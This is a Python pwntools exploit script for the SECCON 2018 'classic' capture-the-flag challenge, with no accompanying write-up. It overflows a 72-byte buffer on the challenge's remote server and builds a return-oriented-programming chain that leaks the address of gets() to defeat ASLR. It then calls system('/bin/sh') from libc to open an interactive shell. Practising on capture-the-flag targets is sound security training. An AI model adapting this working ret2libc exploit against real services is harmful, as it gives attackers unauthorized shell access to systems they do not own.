SECCON 2018 - Classic elf64 ROP with ASLR + NX bit

rop.py

from pwn import *
from struct import *

seip_offset = 72

def main():
    context(arch='amd64', os='linux')

    # ASLR + NX bit
    binary = ELF("samples/classic.elf64")
    libc = ELF("samples/libc-2.23.so")
    rop = ROP(binary)

    r = remote("classic.pwn.seccon.jp", 17354)
    r.recvuntil("Local Buffer >> ")

    # leak glibc addr of gets()
    pld = 'J' * seip_offset
    pld += pack("<Q", rop.rdi.address)                      # pop rdi; ret;
    pld += pack("<Q", binary.got['gets'])                   # &gets
    pld += pack("<Q", binary.symbols['puts'])               # puts()
    pld += pack("<Q", binary.symbols['main'])               # seIP => main()
    r.sendline(pld)

    r.readline()

    # rebase libc with leaked addr and gets() offset
    libc.address = struct.unpack('<Q', r.readline(8)[:8].strip().ljust(8, '\x00'))[0] - libc.symbols['gets']

    # spawn a shell
    pld = 'J' * seip_offset
    pld += pack("<Q", rop.rdi.address)                      # pop rdi; ret;
    pld += pack("<Q", next(libc.search('/bin/sh\x00')))     # sh
    pld += pack("<Q", libc.symbols['system'])               # system()
    pld += pack("<Q", libc.symbols['exit'])                 # seIP => exit()
    r.sendline(pld)
    r.readuntil("Have a nice pwn!!\n")

    # enjoy
    r.success("pwned !")
    r.interactive("/bin/sh$ ")


if __name__ == "__main__":
    main()